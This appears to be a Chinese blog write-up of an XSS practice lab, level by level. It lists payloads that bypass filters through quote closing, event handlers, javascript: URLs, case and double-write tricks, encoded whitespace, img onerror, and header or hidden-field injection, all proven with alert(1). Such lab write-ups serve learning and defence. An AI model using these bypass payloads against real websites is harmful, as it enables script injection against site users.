0x00前言

之前向群里一个大佬要了一个xss的靶场 网页版的做做也蛮好玩的 前几天把这个靶场重新做了一下 然后今天来归纳一下当中的一些xss绕过的手段

0x01正文

level1 : 非常的简单我们可以看到网址后面就是一个注入点 直接输入 test=<script>alert(1)</script> 就可以轻松的过关了

level2 : 这里给了一个搜索框 payload还是和之前的相似就是我们只需要闭合前面的双引号就可以了 所以 payload就是 “><script>alert(1)</script> 这样把前面的双引号闭合就可以了

level3 : 首先我输入了level2的payload 查看源码 发现了几处和之前不一样的地方 首先这里前面的是单引号 所以我们需要用单引号来进行闭合 然后这里的尖括号直接被转义了 所以这里 <> 这里是用不到的了 这里其实我们可以利用事件 onclick 所以payload是 ‘ onclick=alert(1)’

level4 : 与上面的题目是类似的 ” onclick=alert(1) ” 成功

level 5: 这里过滤掉了 onclick 和script 所以我们利用伪协议➕a标签来进行绕过 “><a href =”javascript:alert(1);” 成功

level 6 : 这题其实很简单只需要script 大小写绕过就可以了

level 7: 这里把script整个都过滤了 所以我们复写script就可以了 scrscriptipt 这样就可以了

level 8 : 这里给了href 所以利用JavaScript 伪协议进行绕过然后发现 被过滤了大小写这些都不可以 所以我们使用html实体编码来进行绕过javascript:alert(1)

level 9: 经过一系列的测试发现要合法的url 那么合法的url 差不多就是这样 http:// 所以这里是检测 有没有 http:// 这个的 所以 javascr%09ipt:alert(1)//http://

level 10 : 通过观察源代码 发现 t_sort 是可以进行注入的 所以 &t_sort=" type="text" onclick="alert(1)由于原来的 type 是hidden 所以也就意味着我们无法进行修改 所以我们要把type的形式改成text 这样就可以了

level 11,12,13 都是在cookie referer user-agent上进行注入

level 14 好像是修改图片上传这个没有具体做

level 15 : 使用img 标签来进行注入 name=<img src=1 onerror=alert(1)>'

level 16: 和上面的差不多 利用%0a来进行过滤的绕过 keyword=%3Cimg%0asrc=1%0aonerror=alert(1)%3E

level 17: 直接插入事件 arg01=a&arg02=b onmouseover=alert(1)

level 18 :与之前的 一样

发表评论

电子邮件地址不会被公开。 必填项已用*标注